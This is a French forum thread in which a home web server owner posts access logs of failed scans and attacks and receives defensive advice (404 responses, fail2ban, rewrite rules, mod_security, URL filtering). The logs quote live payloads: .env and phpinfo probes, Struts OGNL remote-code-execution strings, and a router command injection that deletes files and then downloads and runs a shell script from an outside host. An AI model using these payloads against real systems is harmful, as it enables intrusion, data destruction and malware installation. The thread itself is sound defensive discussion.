IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

Sécurité Discussion :

Attaques d'un serveur web avec des ip proches


Sujet :

Sécurité

  1. #1
    Membre confirmé Avatar de nl.smart
    Homme Profil pro
    ouvrier
    Inscrit en
    Avril 2019
    Messages
    145
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Meurthe et Moselle (Lorraine)

    Informations professionnelles :
    Activité : ouvrier
    Secteur : Industrie

    Informations forums :
    Inscription : Avril 2019
    Messages : 145
    Points : 493
    Points
    493
    Par défaut Attaques d'un serveur web avec des ip proches
    Bonjour,

    Comment se protéger d'attaques dont l'origine est une ip proche (45.131.193.???) ?

    Les log ci-dessous font apparaître des erreurs 301 qui n'ont donc pas abouties contre mon serveur web sous linux.


    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    45.131.193.82 - - [23/Dec/2023:22:02:27 +0100] "GET /.env HTTP/1.1" 301 236
    45.131.193.85 - - [23/Dec/2023:22:02:28 +0100] "GET /core/.env HTTP/1.1" 301 241
    45.131.193.86 - - [23/Dec/2023:22:02:29 +0100] "GET /web/.env HTTP/1.1" 301 240
    45.131.193.72 - - [23/Dec/2023:22:02:29 +0100] "GET /app/.env HTTP/1.1" 301 240
    45.131.193.69 - - [23/Dec/2023:22:02:30 +0100] "GET /laravel/.env HTTP/1.1" 301 244
    45.131.193.80 - - [23/Dec/2023:22:02:30 +0100] "GET /crm/.env HTTP/1.1" 301 240
    45.131.193.83 - - [23/Dec/2023:22:02:30 +0100] "GET /backend/.env HTTP/1.1" 301 244
    45.131.193.76 - - [23/Dec/2023:22:02:31 +0100] "GET /local/.env HTTP/1.1" 301 242
    45.131.193.82 - - [23/Dec/2023:22:02:31 +0100] "GET /application/.env HTTP/1.1" 301 248
    45.131.193.75 - - [23/Dec/2023:22:02:31 +0100] "GET /admin/.env HTTP/1.1" 301 242
    45.131.193.81 - - [23/Dec/2023:22:02:32 +0100] "GET /prod/.env HTTP/1.1" 301 241
    45.131.193.63 - - [23/Dec/2023:22:02:32 +0100] "GET /api/.env HTTP/1.1" 301 240
    45.131.193.74 - - [23/Dec/2023:22:02:32 +0100] "GET /beta/.env HTTP/1.1" 301 241
    45.131.193.73 - - [23/Dec/2023:22:02:33 +0100] "GET /env.js HTTP/1.1" 301 238
    45.131.193.69 - - [23/Dec/2023:22:02:33 +0100] "GET /config.js HTTP/1.1" 301 241
    45.131.193.78 - - [23/Dec/2023:22:02:35 +0100] "GET /.env.save HTTP/1.1" 301 241
    45.131.193.81 - - [23/Dec/2023:22:02:35 +0100] "GET /_profiler/phpinfo HTTP/1.1" 301 249
    45.131.193.69 - - [23/Dec/2023:22:02:35 +0100] "GET /phpinfo.php HTTP/1.1" 301 243
    45.131.193.60 - - [23/Dec/2023:22:02:35 +0100] "GET /info.php HTTP/1.1" 301 240
    45.131.193.65 - - [23/Dec/2023:22:02:36 +0100] "GET /config.php HTTP/1.1" 301 242
    45.131.193.86 - - [23/Dec/2023:22:02:36 +0100] "GET /database.php HTTP/1.1" 301 244
    Merci pour vos lumières.

  2. #2
    Membre confirmé Avatar de nl.smart
    Homme Profil pro
    ouvrier
    Inscrit en
    Avril 2019
    Messages
    145
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Meurthe et Moselle (Lorraine)

    Informations professionnelles :
    Activité : ouvrier
    Secteur : Industrie

    Informations forums :
    Inscription : Avril 2019
    Messages : 145
    Points : 493
    Points
    493
    Par défaut
    C'est Noël, il vient de remettre le couvert avec des attaques aboutissant à des erreurs 404

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    45.131.193.81 - - [24/Dec/2023:01:12:54 +0100] "GET /.env HTTP/1.1" 404 977
    45.131.193.64 - - [24/Dec/2023:01:12:55 +0100] "GET /core/.env HTTP/1.1" 404 977
    45.131.193.85 - - [24/Dec/2023:01:12:56 +0100] "GET /web/.env HTTP/1.1" 404 977
    45.131.193.61 - - [24/Dec/2023:01:12:58 +0100] "GET /app/.env HTTP/1.1" 404 977
    45.131.193.83 - - [24/Dec/2023:01:13:00 +0100] "GET /laravel/.env HTTP/1.1" 404 977
    45.131.193.68 - - [24/Dec/2023:01:13:01 +0100] "GET /crm/.env HTTP/1.1" 404 977
    45.131.193.68 - - [24/Dec/2023:01:13:03 +0100] "GET /backend/.env HTTP/1.1" 404 977
    45.131.193.76 - - [24/Dec/2023:01:13:04 +0100] "GET /local/.env HTTP/1.1" 404 977
    45.131.193.65 - - [24/Dec/2023:01:13:06 +0100] "GET /application/.env HTTP/1.1" 404 977
    45.131.193.60 - - [24/Dec/2023:01:13:07 +0100] "GET /admin/.env HTTP/1.1" 404 977
    45.131.193.60 - - [24/Dec/2023:01:13:09 +0100] "GET /prod/.env HTTP/1.1" 404 977
    45.131.193.80 - - [24/Dec/2023:01:13:10 +0100] "GET /api/.env HTTP/1.1" 404 977
    45.131.193.72 - - [24/Dec/2023:01:13:11 +0100] "GET /beta/.env HTTP/1.1" 404 977
    45.131.193.65 - - [24/Dec/2023:01:13:12 +0100] "GET /env.js HTTP/1.1" 404 977
    45.131.193.80 - - [24/Dec/2023:01:13:13 +0100] "GET /config.js HTTP/1.1" 404 977
    45.131.193.64 - - [24/Dec/2023:01:13:15 +0100] "GET /.env.save HTTP/1.1" 404 977
    45.131.193.83 - - [24/Dec/2023:01:13:16 +0100] "GET /_profiler/phpinfo HTTP/1.1" 404 977
    45.131.193.66 - - [24/Dec/2023:01:13:17 +0100] "GET /phpinfo.php HTTP/1.1" 404 16
    45.131.193.65 - - [24/Dec/2023:01:13:18 +0100] "GET /info.php HTTP/1.1" 404 16
    45.131.193.75 - - [24/Dec/2023:01:13:20 +0100] "GET /config.php HTTP/1.1" 404 16
    45.131.193.73 - - [24/Dec/2023:01:13:21 +0100] "GET /database.php HTTP/1.1" 404 16
    45.131.193.72 - - [24/Dec/2023:01:13:22 +0100] "GET /.get/config HTTP/1.1" 404 977
    45.131.193.70 - - [24/Dec/2023:01:13:23 +0100] "GET /system/.env HTTP/1.1" 404 977
    45.131.193.75 - - [24/Dec/2023:01:13:24 +0100] "GET /protected/.env HTTP/1.1" 404 977
    45.131.193.63 - - [24/Dec/2023:01:13:25 +0100] "GET /public/assets/.protected/.env HTTP/1.1" 404 977
    La question est encore ouverte, comment se protéger de ce type d'attaques ?

    J'ai trouvé peu de ressources à ce sujet https://webmasters.stackexchange.com...ange-66-249-72

  3. #3
    Membre confirmé Avatar de nl.smart
    Homme Profil pro
    ouvrier
    Inscrit en
    Avril 2019
    Messages
    145
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Meurthe et Moselle (Lorraine)

    Informations professionnelles :
    Activité : ouvrier
    Secteur : Industrie

    Informations forums :
    Inscription : Avril 2019
    Messages : 145
    Points : 493
    Points
    493
    Par défaut
    Il semblerait que crowdsec propose une solution quant aux attaques de type near range ip attacks.
    Wait and see.

    https://app.crowdsec.net/hub/author/...con-drop_range

    Vos retours et points de vue sont les bienvenus.

  4. #4
    Membre éprouvé
    Homme Profil pro
    Robotique
    Inscrit en
    Août 2007
    Messages
    590
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Nord (Nord Pas de Calais)

    Informations professionnelles :
    Activité : Robotique

    Informations forums :
    Inscription : Août 2007
    Messages : 590
    Points : 1 186
    Points
    1 186
    Par défaut
    Bonsoir,

    Avec iptables en premier lieu.
    Sinon on peut mettre en place fail2ban qui fera la surveillance et les bans automatiquement.

    hth,

  5. #5
    Membre éclairé
    Homme Profil pro
    Urbaniste
    Inscrit en
    Août 2023
    Messages
    367
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : Autre

    Informations professionnelles :
    Activité : Urbaniste

    Informations forums :
    Inscription : Août 2023
    Messages : 367
    Points : 733
    Points
    733
    Par défaut
    Bonjour,

    pas utile, c'est un scan distribué, ou autre, pas un ddos.

    Votre module bloquera la range si au moins 5 ip de la range sont bannies,
    hors, de ce que vos logs affichent, vous n'obtiendrez jamais ces 5 ips.

    Votre problème n'est pas de prévenir le scan, c'est d'y répondre correctement.
    Ce genre de scan est un lot commun.

    Dans votre premier extrait de log, je suppose que l'application fait des 301 vers l'accueil.
    Pour 1 requête de scan vous dites au scanner d'en faire une seconde.
    Pas utile.
    Ce serait mieux de répondre une 404.

    Dans votre second exemple de log vous avez deux types de réponse 404,
    une courte de 16 octets, une longue de 977 octets.
    Ce serait mieux de ne retourner que des réponses courte, voir vide.

    Pour le reste, tant que l'attaquant aura du pognon à dépenser,
    ce genre de scan continuera.

    Maintenant, pour vraiment faire de la détection par range,
    fail2ban doit pouvoir aider en utilisant un script de ce type
    https://github.com/WKnak/fail2ban-block-ip-range/blob/main/fail2ban-block-ip-range.py

    Vous pourriez aussi considérer votre problème par l'exclusion de d'url de requête.
    Visiblement, le monsieur cherche des .env et autres,
    une série de rewriterule fera le travail.

    Autrement il existe ce bon vieux mod_security
    https://github.com/SpiderLabs/ModSecurity

    Tout cela existe aussi bien pour nginx, lighthttpd, iis etc

    Mais bon pour 1QPS normalement vous ne devriez pas vous en préoccuper.

    Bonne journée.

  6. #6
    Membre confirmé Avatar de nl.smart
    Homme Profil pro
    ouvrier
    Inscrit en
    Avril 2019
    Messages
    145
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Meurthe et Moselle (Lorraine)

    Informations professionnelles :
    Activité : ouvrier
    Secteur : Industrie

    Informations forums :
    Inscription : Avril 2019
    Messages : 145
    Points : 493
    Points
    493
    Par défaut
    Merci à vous 2 pour vos réponses et les lumières que vous apportez quant à la problématique rencontrée.

    Des mesures de sécurité sont bien entendues déjà en place sur le home web server parmi celles que vous citez. Il s'agit de must have pour un minimum de sécurité pour un serveur web.

    Je me pencherai sur vos liens (qui compléteront les ids && ips en place) dès que possible, espérant être en mesure de mettre en place certaines nouvelles mesures proposées. En tous cas il y a de la matière (c'est dense) pour le novice que je suis et ainsi parfaire les connaissances dans le domaine.

  7. #7
    Membre confirmé Avatar de nl.smart
    Homme Profil pro
    ouvrier
    Inscrit en
    Avril 2019
    Messages
    145
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Meurthe et Moselle (Lorraine)

    Informations professionnelles :
    Activité : ouvrier
    Secteur : Industrie

    Informations forums :
    Inscription : Avril 2019
    Messages : 145
    Points : 493
    Points
    493
    Par défaut
    Il y en a qui sont violents dès le matin !

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    145.239.11.122 - - [07/Feb/2024:07:46:11 +0100] "GET /login.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 977
    145.239.11.122 - - [07/Feb/2024:07:46:11 +0100] "GET /index.action?redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 404 977
    145.239.11.122 - - [07/Feb/2024:07:46:11 +0100] "GET /index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 404 977
    145.239.11.122 - - [07/Feb/2024:07:46:11 +0100] "GET /index.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 977
    145.239.11.122 - - [07/Feb/2024:07:46:11 +0100] "GET /login.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 977
    145.239.11.122 - - [07/Feb/2024:07:46:12 +0100] "GET /index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 977
    145.239.11.122 - - [07/Feb/2024:07:46:12 +0100] "GET /index.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 977
    145.239.11.122 - - [07/Feb/2024:07:46:12 +0100] "GET /login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 404 977
    145.239.11.122 - - [07/Feb/2024:07:46:12 +0100] "GET /index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 404 977

  8. #8
    Membre éclairé
    Homme Profil pro
    Urbaniste
    Inscrit en
    Août 2023
    Messages
    367
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : Autre

    Informations professionnelles :
    Activité : Urbaniste

    Informations forums :
    Inscription : Août 2023
    Messages : 367
    Points : 733
    Points
    733
    Par défaut
    c'est intéressant, ça ressemble à un RCE sur du java.
    Je ne savais pas qu'ils utilisaient ce genre de technique d'évaluation de code dans leurs frameworks.
    https://www.google.com/search?q=opensymphony+java+rce

    Mais 5QPS, en visitant n'importe quelle page web, un utilisateur en fait autant à causes des assets.
    Il suffit d'avoir le HTML + 2 css + 2 scripts chargés depuis le même domaine, et il atteint 5qps.

    Ces requêtes s'éliminent facilement en identifiant i/java.lang.[a-z]+/ dans l'url.
    Pour un site PHP, c'est hautement douteux vu d'ici.

  9. #9
    Membre confirmé Avatar de nl.smart
    Homme Profil pro
    ouvrier
    Inscrit en
    Avril 2019
    Messages
    145
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Meurthe et Moselle (Lorraine)

    Informations professionnelles :
    Activité : ouvrier
    Secteur : Industrie

    Informations forums :
    Inscription : Avril 2019
    Messages : 145
    Points : 493
    Points
    493
    Par défaut
    Merci pour votre retour d'expériences, connaissances.

    Encore un pour la route, ce code apparaît dans mes logs ces temps-ci

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    185.224.128.10 - - [11/Feb/2024:17:00:37 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F192.3.152.183%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 403 967
    185.224.128.10 - - [11/Feb/2024:17:00:37 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F192.3.152.183%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 403 967
    
    185.224.128.10 - - [11/Feb/2024:14:54:05 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F192.3.152.183%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 301 434
    185.224.128.10 - - [11/Feb/2024:14:54:05 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F192.3.152.183%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 301 434
    185.224.128.10 - - [11/Feb/2024:19:11:01 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F192.3.152.183%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 301 434
    185.224.128.10 - - [11/Feb/2024:19:11:01 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F192.3.152.183%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 301 434

  10. #10
    Membre éclairé
    Homme Profil pro
    Urbaniste
    Inscrit en
    Août 2023
    Messages
    367
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : Autre

    Informations professionnelles :
    Activité : Urbaniste

    Informations forums :
    Inscription : Août 2023
    Messages : 367
    Points : 733
    Points
    733
    Par défaut
    celui là ne rigole pas =) rm%20-rf%20%2A%3B%20

  11. #11
    Membre confirmé Avatar de nl.smart
    Homme Profil pro
    ouvrier
    Inscrit en
    Avril 2019
    Messages
    145
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Meurthe et Moselle (Lorraine)

    Informations professionnelles :
    Activité : ouvrier
    Secteur : Industrie

    Informations forums :
    Inscription : Avril 2019
    Messages : 145
    Points : 493
    Points
    493
    Par défaut
    Merci pour votre expertise, je ne l'avais pas vu celui-là...

    D'autres ont aussi signalé ces frasques...

    https://www.abuseipdb.com/check/185.224.128.10

    Vue son historique le nécessaire a été mis en place pour qu'il soit persona non grata sur mon réseau.

Discussions similaires

  1. Réponses: 3
    Dernier message: 11/12/2006, 20h57
  2. créer deux serveur web avec un seul adresse ip?
    Par Djo00 dans le forum Apache
    Réponses: 3
    Dernier message: 23/08/2006, 10h13
  3. Petit serveur Web avec du PHP
    Par olive_le_malin dans le forum EDI, CMS, Outils, Scripts et API
    Réponses: 10
    Dernier message: 08/05/2006, 21h08
  4. [SQL-Server] Quel serveur Web avec SQL Server ?
    Par wolflinger dans le forum PHP & Base de données
    Réponses: 4
    Dernier message: 15/03/2006, 10h15

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo